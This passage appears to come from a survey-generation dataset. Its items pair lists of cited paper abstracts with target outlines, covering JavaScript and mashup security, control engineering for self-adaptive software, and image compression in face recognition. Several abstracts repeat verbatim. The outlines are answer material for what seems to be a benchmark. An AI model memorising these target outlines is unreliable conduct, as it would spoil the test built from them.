compiler can effortlessly be applied to existing mashups based on a wide-range of gadget APIs. It offers security and correct-ness guarantees. Security is achieved via the Same Origin Policy. Correctness is ensured in the presence of benign gadgets, that satisfy confidentiality and integrity constrains with regard to the integrator code. The compiler has been successfully applied to real world mashups based on Google maps, Bing maps, YouTube, and Zwibbler APIs. --- paper_title: Security of Web Mashups: a Survey paper_content: Web mashups, a new web application development paradigm, combine content and services from multiple origins into a new service. Web mashups heavily depend on interaction between content from multiple origins and communication with different origins. Contradictory, mashup security relies on separation for protecting code and data. Traditional HTML techniques fail to address both the interaction/communication needs and the separation needs. This paper proposes concrete requirements for building secure mashups, divided in four categories: separation, interaction, communication and advanced behavior control. For the first three categories, all currently available techniques are discussed in light of the proposed requirements. For the last category, we present three relevant academic research results with high potential. We conclude the paper by highlighting the most applicable techniques for building secure mashups, because of functionality and standardization. We also discuss opportunities for future improvements and developments. ---
Title: Survey on JavaScript Security Policies and their Enforcement Mechanisms in a Web Browser Section 1: Introduction Description 1: Introduce the rapid growth of web-based applications, the role of JavaScript, and outline the goal of the survey on security enforcement mechanisms. Section 2: Background on JavaScript Security Description 2: Provide an overview of web browser architecture, access control mechanisms, and security problems related to JavaScript programs. Section 3: Security-relevant browser APIs Description 3: Identify and describe the set of security-relevant APIs in the browser and their role in security policies. Section 4: Dynamic techniques based on runtime monitoring Description 4: Present dynamic techniques based on runtime monitoring for JavaScript security and give examples of safety properties enforced by these techniques. Section 5: Information flow security analysis for JavaScript Description 5: Discuss the main achievements in applying information flow analysis to JavaScript, including explicit and implicit information flows, flow-sensitivity, and static vs. dynamic analysis. Section 6: Summary of information flow policies Description 6: Gather and summarize the information flow policies enforced by various techniques. Section 7: Other related work on JavaScript Security Description 7: Discuss additional work in the area of JavaScript security, including static analysis of widgets, analysis of sandboxing libraries, and other approaches to mashup security. Section 8: Conclusion Description 8: Conclude the survey with a summary of the discussed techniques and their effectiveness in enforcing JavaScript security policies.
A systematic survey on the design of self-adaptive software systems using control engineering approaches
7
--- paper_title: Research challenges in control engineering of computing systems paper_content: A wide variety of software systems employ closed loops (feedback) to achieve service level objectives and to optimize resource usage. Control theory provides a systematic approach to constructing closed loop systems, and is widely used in disciplines such as mechanical and electrical engineering. This paper describes recent advances in applying control theory to computing systems, and identifies research challenges to address so that control engineering can be widely used by software practitioners. --- paper_title: Self-adaptive software: Landscape and research challenges paper_content: Software systems dealing with distributed applications in changing environments normally require human supervision to continue operation in all conditions. These (re-)configuring, troubleshooting, and in general maintenance tasks lead to costly and time-consuming procedures during the operating phase. These problems are primarily due to the open-loop structure often followed in software development. Therefore, there is a high demand for management complexity reduction, management automation, robustness, and achieving all of the desired quality requirements within a reasonable cost and time range during operation. Self-adaptive software is a response to these demands; it is a closed-loop system with a feedback loop aiming to adjust itself to changes during its operation. These changes may stem from the software system's self (internal causes, e.g., failure) or context (external events, e.g., increasing requests from users). Such a system is required to monitor itself and its context, detect significant changes, decide how to react, and act to execute such decisions. These processes depend on adaptation properties (called self-* properties), domain characteristics (context information or models), and preferences of stakeholders. Noting these requirements, it is widely believed that new models and frameworks are needed to design self-adaptive software. This survey article presents a taxonomy, based on concerns of adaptation, that is, how, what, when and where, towards providing a unified view of this emerging area. Moreover, as adaptive systems are encountered in many disciplines, it is imperative to learn from the theories and models developed in these other areas. This survey article presents a landscape of research in self-adaptive software by highlighting relevant disciplines and some prominent research projects. This landscape helps to identify the underlying research gaps and elaborates on the corresponding challenges. --- paper_title: Beyond objects: a software design paradigm based on process control paper_content: A standard demonstration problem in object-oriented programming is the design of an automobile cruise control. This design exercise demonstrates object-oriented techniques well, but it does not ask whether the object-oriented paradigm is the best one for the task. Here we examine the alternative view that cruise control is essentially a control problem. We present a new software organization paradigm motivated by process control loops. The control view leads us to an architecture that is dominated by analysis of a classical feedback loop rather than by the identification of discrete stateful components to treat as objects. The change in architectural model calls attention to important questions about the cruise control task that aren't addressed in an object-oriented design. --- paper_title: Challenges in control engineering of computing systems paper_content: Over the last few years, there has been considerable success with applying control theory to computing systems. Our experience has been that there are several commonly occurring control problems in computing systems - translating between service oriented units (e.g., response times) and effector (actuator) units (e.g., the maximum number of connected users); optimizing resource usage; regulating service levels to enforce service level agreements; and adapting to disturbances such as changes in workloads. Developing control systems that address these problems involves challenges related to modeling the managed element (plant); handing sensor data that are noisy, incomplete, and inconsistent; dealing with effectors that have complex effects that often do not correspond well to the control objectives; and designing control systems (especially filters, the choice of measured outputs, and time delays). --- paper_title: Honoring SLAs on cloud computing services: A control perspective paper_content: This work contains a short survey of recent results in the literature with a view to opening up new research directions for the problem of honoring SLAs on cloud computing services. This is a new problem that has attracted significant interest recently, due to the urgent need for providers to provide reliable, customized and QoS guaranteed computing dynamic environments for end-users as agreed in contracts on the basis of certain Service Level Agreements (SLAs). Honoring SLAs is a multi-faceted problem that may involve optimal use of the available resources, optimization of the system's performance and availability or maximization of the provider's revenue and it poses a significant challenge for researchers and system administrators due to the volatile, huge and unpredictable Web environments where these computing systems reside. The use of algorithms possessing run-time adaptation features, such as dynamic resource allocation, admission control and optimization becomes an absolute must. As a continuation of the recent successful application of control theory concepts and methods to the computing systems area, our survey indicates that the problem of honoring SLAs on cloud computing services is a new interesting application for control theory and that researchers can benefit significantly from a number of well-known modern control methodologies, such as hybrid, supervisory, hierarchical and model predictive control. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Software Engineering for Self-Adaptive Systems paper_content: One of the main goals of a self-adaptable software system is to meet the required Quality of Service (QoS) by autonomously modifying its structure/behavior in response to changes in the supporting infrastructure and surrounding physical environment. A key issue in the design and development of such system is the assessment of their effectiveness, both in terms of their ability to meet the required QoS under different operating conditions, and in terms of the costs involved by the reconfiguration process, which could outweigh the benefit of the reconfiguration. This paper introduces an approach to support this assessment, with a focus on performance and dependability attributes. Our approach is based on the idea of defining a model transformation chain that maps a “design oriented” model of the system to an “analysis oriented” model that lends itself to the application of a suitable analysis methodology. We identify some key concepts that should be present in the design model of a dynamically adaptable system, and show how to devise a transformation from such a model to a target analysis models, focusing in particular on models of component or service oriented systems --- paper_title: A survey of autonomic computing—degrees, models, and applications paper_content: Autonomic Computing is a concept that brings together many fields of computing with the purpose of creating computing systems that self-manage. In its early days it was criticised as being a “hype topic” or a rebadging of some Multi Agent Systems work. In this survey, we hope to show that this was not indeed ‘hype’ and that, though it draws on much work already carried out by the Computer Science and Control communities, its innovation is strong and lies in its robust application to the specific self-management of computing systems. To this end, we first provide an introduction to the motivation and concepts of autonomic computing and describe some research that has been seen as seminal in influencing a large proportion of early work. Taking the components of an established reference model in turn, we discuss the works that have provided significant contributions to that area. We then look at larger scaled systems that compose autonomic systems illustrating the hierarchical nature of their architectures. Autonomicity is not a well defined subject and as such different systems adhere to different degrees of Autonomicity, therefore we cross-slice the body of work in terms of these degrees. From this we list the key applications of autonomic computing and discuss the research work that is missing and what we believe the community should be considering. --- paper_title: A survey on performance management for internet applications paper_content: Internet applications have become indispensable for many business and personal processes, turning the performance of these applications into a key issue. For this reason, recent research has comprehensively explored mechanisms for managing the performance of these applications, with special focus on dealing with overload situations and providing QoS guarantees to clients. This paper makes a survey on the different proposals in the literature for managing Internet applications' performance. We present a complete taxonomy that characterizes and classifies these proposals into several categories including request scheduling, admission control, service differentiation, dynamic resource management, service degradation, control theoretic approaches, works using queuing models, observation-based approaches that use runtime measurements, and overall approaches combining several mechanisms. For each work, we provide a brief description in order to provide the reader with a global understanding of the research progress in this area. Copyright © 2009 John Wiley & Sons, Ltd. --- paper_title: Research challenges in control engineering of computing systems paper_content: A wide variety of software systems employ closed loops (feedback) to achieve service level objectives and to optimize resource usage. Control theory provides a systematic approach to constructing closed loop systems, and is widely used in disciplines such as mechanical and electrical engineering. This paper describes recent advances in applying control theory to computing systems, and identifies research challenges to address so that control engineering can be widely used by software practitioners. --- paper_title: A multi-model framework to implement self-managing control systems for QoS management paper_content: Many control theory based approaches have been proposed to provide QoS assurance in increasingly complex software systems. These approaches generally use single model based, fixed or adaptive control techniques for QoS management of such systems. With varying system dynamics and unpredictable environmental changes, however, it is difficult to design a single model or controller to achieve the desired QoS performance across all the operating regions of these systems. In this paper, we propose a multi-model framework to capture the multi-model nature of software systems and implement self-managing control systems for them. A reference-model and extendable class library are introduced to implement such self-managing control systems. The proposed approach is also validated and compared to fixed and adaptive control schemes through a range of experiments. --- paper_title: Self-adaptive software: Landscape and research challenges paper_content: Software systems dealing with distributed applications in changing environments normally require human supervision to continue operation in all conditions. These (re-)configuring, troubleshooting, and in general maintenance tasks lead to costly and time-consuming procedures during the operating phase. These problems are primarily due to the open-loop structure often followed in software development. Therefore, there is a high demand for management complexity reduction, management automation, robustness, and achieving all of the desired quality requirements within a reasonable cost and time range during operation. Self-adaptive software is a response to these demands; it is a closed-loop system with a feedback loop aiming to adjust itself to changes during its operation. These changes may stem from the software system's self (internal causes, e.g., failure) or context (external events, e.g., increasing requests from users). Such a system is required to monitor itself and its context, detect significant changes, decide how to react, and act to execute such decisions. These processes depend on adaptation properties (called self-* properties), domain characteristics (context information or models), and preferences of stakeholders. Noting these requirements, it is widely believed that new models and frameworks are needed to design self-adaptive software. This survey article presents a taxonomy, based on concerns of adaptation, that is, how, what, when and where, towards providing a unified view of this emerging area. Moreover, as adaptive systems are encountered in many disciplines, it is imperative to learn from the theories and models developed in these other areas. This survey article presents a landscape of research in self-adaptive software by highlighting relevant disciplines and some prominent research projects. This landscape helps to identify the underlying research gaps and elaborates on the corresponding challenges. --- paper_title: Control Systems application in Java based Enterprise and Cloud Environments - A Survey paper_content: The classical feedback control systems has been a successful theory in many engineering applications like electrical power, process, and manufacturing industries. For more than a decade there is active research in exploring feedback control systems applications in computing and some of the results are applied to the commercial software products. There are good number of research review papers on this subject exist, giving high level overview, explaining specific applications like load balancing or CPU utilization power management in data centers. We observe that majority of the control system applications are in Web and Application Server environments. We attempt to discuss on how control systems is applied to Web and Application(JEE) Servers that are deployed in Enterprise and cloud environments. Our paper presents this review with a specific emphasis on Java based Web, Application and Enterprise Server Bus environments. We conclude with the future reserach in applying control systems to Enterprise and Cloud environments. --- paper_title: Challenges in control engineering of computing systems paper_content: Over the last few years, there has been considerable success with applying control theory to computing systems. Our experience has been that there are several commonly occurring control problems in computing systems - translating between service oriented units (e.g., response times) and effector (actuator) units (e.g., the maximum number of connected users); optimizing resource usage; regulating service levels to enforce service level agreements; and adapting to disturbances such as changes in workloads. Developing control systems that address these problems involves challenges related to modeling the managed element (plant); handing sensor data that are noisy, incomplete, and inconsistent; dealing with effectors that have complex effects that often do not correspond well to the control objectives; and designing control systems (especially filters, the choice of measured outputs, and time delays). --- paper_title: Honoring SLAs on cloud computing services: A control perspective paper_content: This work contains a short survey of recent results in the literature with a view to opening up new research directions for the problem of honoring SLAs on cloud computing services. This is a new problem that has attracted significant interest recently, due to the urgent need for providers to provide reliable, customized and QoS guaranteed computing dynamic environments for end-users as agreed in contracts on the basis of certain Service Level Agreements (SLAs). Honoring SLAs is a multi-faceted problem that may involve optimal use of the available resources, optimization of the system's performance and availability or maximization of the provider's revenue and it poses a significant challenge for researchers and system administrators due to the volatile, huge and unpredictable Web environments where these computing systems reside. The use of algorithms possessing run-time adaptation features, such as dynamic resource allocation, admission control and optimization becomes an absolute must. As a continuation of the recent successful application of control theory concepts and methods to the computing systems area, our survey indicates that the problem of honoring SLAs on cloud computing services is a new interesting application for control theory and that researchers can benefit significantly from a number of well-known modern control methodologies, such as hybrid, supervisory, hierarchical and model predictive control. --- paper_title: Introduction to control theory and its application to computing systems paper_content: Feedback control is central to managing computing systems and data networks. Unfortunately, computing practitioners typically approach the design of feedback control in an ad hoc manner. Control theory provides a systematic approach to designing feedback loops that are stable in that they avoid wild oscillations, accurate in that they achieve objectives such as target response times for service level management, and settle quickly to their steady state values. This paper provides an introduction to control theory for computing practitioners with an emphasis on applications in the areas of database systems, real-time systems, virtualized servers, and power management. --- paper_title: What does control theory bring to systems research? paper_content: Feedback mechanisms can help today's increasingly complex computer systems adapt to changes in workloads or operating conditions. Control theory offers a principled way for designing feedback loops to deal with unpredictable changes, uncertainties, and disturbances in systems. We provide an overview of the joint research at HP Labs and University of Michigan in the past few years, where control theory was applied to automated resource and service level management in data centers. We highlight the key benefits of a control-theoretic approach for systems research, and present specific examples from our experience of designing adaptive resource control systems where this approach worked well. In addition, we outline the main limitations of this approach, and discuss the lessons learned from our experience. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Software Engineering for Self-Adaptive Systems paper_content: One of the main goals of a self-adaptable software system is to meet the required Quality of Service (QoS) by autonomously modifying its structure/behavior in response to changes in the supporting infrastructure and surrounding physical environment. A key issue in the design and development of such system is the assessment of their effectiveness, both in terms of their ability to meet the required QoS under different operating conditions, and in terms of the costs involved by the reconfiguration process, which could outweigh the benefit of the reconfiguration. This paper introduces an approach to support this assessment, with a focus on performance and dependability attributes. Our approach is based on the idea of defining a model transformation chain that maps a “design oriented” model of the system to an “analysis oriented” model that lends itself to the application of a suitable analysis methodology. We identify some key concepts that should be present in the design model of a dynamically adaptable system, and show how to devise a transformation from such a model to a target analysis models, focusing in particular on models of component or service oriented systems --- paper_title: A survey on performance management for internet applications paper_content: Internet applications have become indispensable for many business and personal processes, turning the performance of these applications into a key issue. For this reason, recent research has comprehensively explored mechanisms for managing the performance of these applications, with special focus on dealing with overload situations and providing QoS guarantees to clients. This paper makes a survey on the different proposals in the literature for managing Internet applications' performance. We present a complete taxonomy that characterizes and classifies these proposals into several categories including request scheduling, admission control, service differentiation, dynamic resource management, service degradation, control theoretic approaches, works using queuing models, observation-based approaches that use runtime measurements, and overall approaches combining several mechanisms. For each work, we provide a brief description in order to provide the reader with a global understanding of the research progress in this area. Copyright © 2009 John Wiley & Sons, Ltd. --- paper_title: Does the technology acceptance model predict actual use? A systematic literature review paper_content: Context: The technology acceptance model (TAM) was proposed in 1989 as a means of predicting technology usage. However, it is usually validated by using a measure of behavioural intention to use (BI) rather than actual usage. Objective: This review examines the evidence that the TAM predicts actual usage using both subjective and objective measures of actual usage. Method: We performed a systematic literature review based on a search of six digital libraries, along with vote-counting meta-analysis to analyse the overall results. Results: The search identified 79 relevant empirical studies in 73 articles. The results show that BI is likely to be correlated with actual usage. However, the TAM variables perceived ease of use (PEU) and perceived usefulness (PU) are less likely to be correlated with actual usage. Conclusion: Care should be taken using the TAM outside the context in which it has been validated. --- paper_title: Empirical studies of agile software development : A systematic review paper_content: Agile software development represents a major departure from traditional, plan-based approaches to software engineering. A systematic review of empirical studies of agile software development up to and including 2005 was conducted. The search strategy identified 1996 studies, of which 36 were identified as empirical studies. The studies were grouped into four themes: introduction and adoption, human and social factors, perceptions on agile methods, and comparative studies. The review investigates what is currently known about the benefits and limitations of, and the strength of evidence for, agile methods. Implications for research and practice are presented. The main implication for research is a need for more and better empirical studies of agile software development within a common research agenda. For the industrial readership, the review provides a map of findings, according to topic, that can be compared for relevance to their own settings and situations. --- paper_title: Research challenges in control engineering of computing systems paper_content: A wide variety of software systems employ closed loops (feedback) to achieve service level objectives and to optimize resource usage. Control theory provides a systematic approach to constructing closed loop systems, and is widely used in disciplines such as mechanical and electrical engineering. This paper describes recent advances in applying control theory to computing systems, and identifies research challenges to address so that control engineering can be widely used by software practitioners. --- paper_title: Self-adaptive software: Landscape and research challenges paper_content: Software systems dealing with distributed applications in changing environments normally require human supervision to continue operation in all conditions. These (re-)configuring, troubleshooting, and in general maintenance tasks lead to costly and time-consuming procedures during the operating phase. These problems are primarily due to the open-loop structure often followed in software development. Therefore, there is a high demand for management complexity reduction, management automation, robustness, and achieving all of the desired quality requirements within a reasonable cost and time range during operation. Self-adaptive software is a response to these demands; it is a closed-loop system with a feedback loop aiming to adjust itself to changes during its operation. These changes may stem from the software system's self (internal causes, e.g., failure) or context (external events, e.g., increasing requests from users). Such a system is required to monitor itself and its context, detect significant changes, decide how to react, and act to execute such decisions. These processes depend on adaptation properties (called self-* properties), domain characteristics (context information or models), and preferences of stakeholders. Noting these requirements, it is widely believed that new models and frameworks are needed to design self-adaptive software. This survey article presents a taxonomy, based on concerns of adaptation, that is, how, what, when and where, towards providing a unified view of this emerging area. Moreover, as adaptive systems are encountered in many disciplines, it is imperative to learn from the theories and models developed in these other areas. This survey article presents a landscape of research in self-adaptive software by highlighting relevant disciplines and some prominent research projects. This landscape helps to identify the underlying research gaps and elaborates on the corresponding challenges. --- paper_title: A systematic survey on the design of self-adaptive software systems using control engineering approaches paper_content: Control engineering approaches have been identified as a promising tool to integrate self-adaptive capabilities into software systems. Introduction of the feedback loop and controller into the management system potentially enables the software systems to achieve the runtime performance objectives and maintain the integrity of the system when they are operating in unpredictable and dynamic environments. There is a large body of literature that has proposed control engineering solutions for different application domains, handling different performance variables and control objectives. However, the relevant literature is scattered over different conference proceedings, journals and research communities. Consequently, conducting a survey to analyze and classify the existing literature is a useful, yet a challenging task. This paper presents the results of a systematic survey that includes classification and analysis of 161 papers in the existing literature. In order to capture the characteristics of the control solutions proposed in these papers we introduce a taxonomy as a basis for classification of all articles. Finally, survey results are presented, including quantitative, cross and trend analysis. --- paper_title: What does control theory bring to systems research? paper_content: Feedback mechanisms can help today's increasingly complex computer systems adapt to changes in workloads or operating conditions. Control theory offers a principled way for designing feedback loops to deal with unpredictable changes, uncertainties, and disturbances in systems. We provide an overview of the joint research at HP Labs and University of Michigan in the past few years, where control theory was applied to automated resource and service level management in data centers. We highlight the key benefits of a control-theoretic approach for systems research, and present specific examples from our experience of designing adaptive resource control systems where this approach worked well. In addition, we outline the main limitations of this approach, and discuss the lessons learned from our experience. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Software Engineering for Self-Adaptive Systems paper_content: One of the main goals of a self-adaptable software system is to meet the required Quality of Service (QoS) by autonomously modifying its structure/behavior in response to changes in the supporting infrastructure and surrounding physical environment. A key issue in the design and development of such system is the assessment of their effectiveness, both in terms of their ability to meet the required QoS under different operating conditions, and in terms of the costs involved by the reconfiguration process, which could outweigh the benefit of the reconfiguration. This paper introduces an approach to support this assessment, with a focus on performance and dependability attributes. Our approach is based on the idea of defining a model transformation chain that maps a “design oriented” model of the system to an “analysis oriented” model that lends itself to the application of a suitable analysis methodology. We identify some key concepts that should be present in the design model of a dynamically adaptable system, and show how to devise a transformation from such a model to a target analysis models, focusing in particular on models of component or service oriented systems --- paper_title: A survey on performance management for internet applications paper_content: Internet applications have become indispensable for many business and personal processes, turning the performance of these applications into a key issue. For this reason, recent research has comprehensively explored mechanisms for managing the performance of these applications, with special focus on dealing with overload situations and providing QoS guarantees to clients. This paper makes a survey on the different proposals in the literature for managing Internet applications' performance. We present a complete taxonomy that characterizes and classifies these proposals into several categories including request scheduling, admission control, service differentiation, dynamic resource management, service degradation, control theoretic approaches, works using queuing models, observation-based approaches that use runtime measurements, and overall approaches combining several mechanisms. For each work, we provide a brief description in order to provide the reader with a global understanding of the research progress in this area. Copyright © 2009 John Wiley & Sons, Ltd. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: A multi-model framework to implement self-managing control systems for QoS management paper_content: Many control theory based approaches have been proposed to provide QoS assurance in increasingly complex software systems. These approaches generally use single model based, fixed or adaptive control techniques for QoS management of such systems. With varying system dynamics and unpredictable environmental changes, however, it is difficult to design a single model or controller to achieve the desired QoS performance across all the operating regions of these systems. In this paper, we propose a multi-model framework to capture the multi-model nature of software systems and implement self-managing control systems for them. A reference-model and extendable class library are introduced to implement such self-managing control systems. The proposed approach is also validated and compared to fixed and adaptive control schemes through a range of experiments. --- paper_title: A systematic survey on the design of self-adaptive software systems using control engineering approaches paper_content: Control engineering approaches have been identified as a promising tool to integrate self-adaptive capabilities into software systems. Introduction of the feedback loop and controller into the management system potentially enables the software systems to achieve the runtime performance objectives and maintain the integrity of the system when they are operating in unpredictable and dynamic environments. There is a large body of literature that has proposed control engineering solutions for different application domains, handling different performance variables and control objectives. However, the relevant literature is scattered over different conference proceedings, journals and research communities. Consequently, conducting a survey to analyze and classify the existing literature is a useful, yet a challenging task. This paper presents the results of a systematic survey that includes classification and analysis of 161 papers in the existing literature. In order to capture the characteristics of the control solutions proposed in these papers we introduce a taxonomy as a basis for classification of all articles. Finally, survey results are presented, including quantitative, cross and trend analysis. --- paper_title: Introduction to control theory and its application to computing systems paper_content: Feedback control is central to managing computing systems and data networks. Unfortunately, computing practitioners typically approach the design of feedback control in an ad hoc manner. Control theory provides a systematic approach to designing feedback loops that are stable in that they avoid wild oscillations, accurate in that they achieve objectives such as target response times for service level management, and settle quickly to their steady state values. This paper provides an introduction to control theory for computing practitioners with an emphasis on applications in the areas of database systems, real-time systems, virtualized servers, and power management. ---
Title: A systematic survey on the design of self-adaptive software systems using control engineering approaches Section 1: INTRODUCTION Description 1: Describe the motivation, background, and objectives of the survey, including the importance of control engineering approaches in self-adaptive software systems. Section 2: RELATED WORK Description 2: Discuss previous surveys and related work in the field of applying control engineering to software system management, highlighting how this survey differs. Section 3: REVIEW METHOD Description 3: Explain the methodology used to conduct the systematic survey, including research questions, review protocol, and data extraction strategies. Section 4: TAXONOMY Description 4: Present the taxonomy developed to categorize the literature, detailing the characteristics of the target system, control system, and validation methods. Section 5: SURVEY RESULTS Description 5: Provide a detailed quantitative analysis and cross-analysis of the survey results based on the taxonomy, including observed trends and patterns. Section 6: LIMITATIONS OF THE SURVEY Description 6: Outline the limitations of the survey, including potential biases and areas where the survey might not exhaustively cover the literature. Section 7: CONCLUSIONS Description 7: Summarize the findings of the survey, discussing the implications and potential future research directions in the field of self-adaptive software systems using control engineering approaches.
1 Image Compression in Face Recognition-a Literature Survey
8
--- paper_title: The JPEG still picture compression standard paper_content: For the past few years, a joint ISO/CCITT committee known as JPEG (Joint Photographic Experts Group) has been working to establish the first international compression standard for continuous-tone still images, both grayscale and color. JPEG’s proposed standard aims to be generic, to support a wide variety of applications for continuous-tone images. To meet the differing needs of many applications, the JPEG standard includes two basic compression methods, each with various modes of operation. A DCT-based method is specified for “lossy’’ compression, and a predictive method for “lossless’’ compression. JPEG features a simple lossy technique known as the Baseline method, a subset of the other DCT-based modes of operation. The Baseline method has been by far the most widely implemented JPEG method to date, and is sufficient in its own right for a large number of applications. This article provides an overview of the JPEG standard, and focuses in detail on the Baseline method. --- paper_title: Effects of JPEG and JPEG2000 Compression on Face Recognition paper_content: In this paper we analyse the effects that JPEG and JPEG2000 compression have on subspace appearance-based face recognition algorithms. This is the first comprehensive study of standard JPEG2000 compression effects on face recognition, as well as an extension of existing experiments for JPEG compression. A wide range of bitrates (compression ratios) was used on probe images and results are reported for 12 different subspace face recognition algorithms. Effects of image compression on recognition performance are of interest in applications where image storage space and image transmission time are of critical importance. It will be shown that not only that compression does not deteriorate performance but it, in some cases, even improves it slightly. Some unexpected effects will be presented (like the ability of JPEG2000 to capture the information essential for recognizing changes caused by images taken later in time) and lines of further research suggested. --- paper_title: Illumination-tolerant face verification of low-bit-rate JPEG2000 wavelet images with advanced correlation filters for handheld devices paper_content: Face recognition on mobile devices, such as personal digital assistants and cell phones, is a big challenge owing to the limited computational resources available to run verifications on the devices themselves. One approach is to transmit the captured face images by use of the cell-phone connection and to run the verification on a remote station. However, owing to limitations in communication bandwidth, it may be necessary to transmit a compressed version of the image. We propose using the image compression standard JPEG2000, which is a wavelet-based compression engine used to compress the face images to low bit rates suitable for transmission over low-bandwidth communication channels. At the receiver end, the face images are reconstructed with a JPEG2000 decoder and are fed into the verification engine. We explore how advanced correlation filters, such as the minimum average correlation energy filter [ ::: Appl. Opt.26, ::: 3633 ( ::: 1987)] and its variants, perform by using face images captured under different illumination conditions and encoded with different bit rates under the JPEG2000 wavelet-encoding standard. We evaluate the performance of these filters by using illumination variations from the Carnegie Mellon University’s Pose, Illumination, and Expression (PIE) face database. We also demonstrate the tolerance of these filters to noisy versions of images with illumination variations. --- paper_title: A Critical Evaluation of Image and Video Indexing Techniques in the Compressed Domain paper_content: Abstract Image and video indexing techniques are crucial in multimedia applications. A number of indexing techniques that operate in the pixel domain have been reported in the literature. The advent of compression standards has led to the proliferation of indexing techniques in the compressed domain. In this paper, we present a critical review of the compressed domain indexing techniques proposed in the literature. These include transform domain techniques using Fourier transform, cosine transform, Karhunen–Loeve transform, Subbands and wavelets, and spatial domain techniques using vector quantization and fractals. In addition, temporal indexing techniques using motion vectors are also discussed. --- paper_title: Face detection in the compressed domain paper_content: Face detection is important in many algorithms in the areas of machine object recognition and pattern recognition. The kaleidoscope of applications for face detection extends across automatic image and home video content annotation, face-image stabilisation and face recognition systems. By using information derived from colour, luminosity and frequency the face detection algorithm proposed in this paper aims to determine the location of multiple frontal and non-frontal faces in compressed MPEG-1, MPEG-2 video or JPEG image content. The described algorithm requires only low computational resources on CE devices and offers at one and the same time extremely high detection rates. --- paper_title: Object Recognition in Compressed Imagery paper_content: Image-based applications can save time and space by operating on compressed data. The problem is that most mid- and high-level image operations, such as object recognition, are formulated as sequences of operations in the image domain. Such methods need direct access to pixel information as a starting point, but the pixel information in a compressed image stream is not immediately accessible. In this paper we show how to perform object recognition directly on compressed images (JPEG) and index frames from video streams (MPEG I-frames) without recovering explicit pixel information. The approach uses eigenvectors constructed from compressed image data. Our performance results show that a five-fold speedup can be gained by using compressed data. --- paper_title: Application of the DCT Energy Histogram for Face Recognition paper_content: In this paper, we investigate the face recognition problem via energy histogram of the DCT coefficients. Several issues related to the recognition performance are discussed, In particular the issue of histogram bin sizes and feature sets. In addition, we propose a technique for selecting the classification threshold incrementally. Experimentation was conducted on the Yale face database and results indicated that the threshold obtained via the proposed technique provides a balanced recognition in term of precision and recall. Furthermore, it demonstrated that the energy histogram algorithm outperformed the well-known Eigenface algorithm. --- paper_title: Image Indexing in DCT Domain paper_content: With the rapid growing of multimedia technology, more and more multimedia content are disseminated in the network or stored in the database. Image data is one of the multimedia types to be seen or accessed for the users in the Internet or from the database. Searching the related images by the querying image content is helpful to the management of image database. Most of the images are joint photographic experts group (JPEG) file format. Full decompression of JPEG file to spatial domain to extract the features for indexing takes time. Therefore, the research of JPEG file format indexing technique is worthwhile because it does not need the extra time to fulfill inverse discrete cosine transform (IDCT). Essentially, the proposed method is a content-based image retrieval (CBIR) system that can retrieval the images from the image database. In order to increase the efficiency of processing time, the proposed method fulfills partial decoding to JPEG file directly instead of full decoding and the feature vector extracted from the partial decoding can ensure the precise indexing as well. The system can output ranked images according to the similarity values in short time. In addition, the system has the property of robustness to rotation, scaling, translation, darkening, lightening, cropping, noise corruption, etc. Simulation results demonstrate that the performance of the proposed method outperforms the other existing DCT-based image indexing skills both from the aspects of robustness and processing burden --- paper_title: Pattern recognition in compressed DCT domain paper_content: Images and video are currently predominantly handled in compressed form. Block-based compression standards are by far the most widespread. It is thus important to devise information processing methods operating directly in compressed domain. In this paper we investigate this possibility on the example of simple face information processing method based on the DCT (discrete cosine transform) blocks. We use patterns of quantized 4x4 DCT blocks for representing local picture information. These patterns at different quantization levels provide very flexible representation of picture information. We represent global information in pictures by histograms of quantized DCT pattern distributions. The approach is tested on database of face images and it is shown that despite its simplicity provides good results in the face 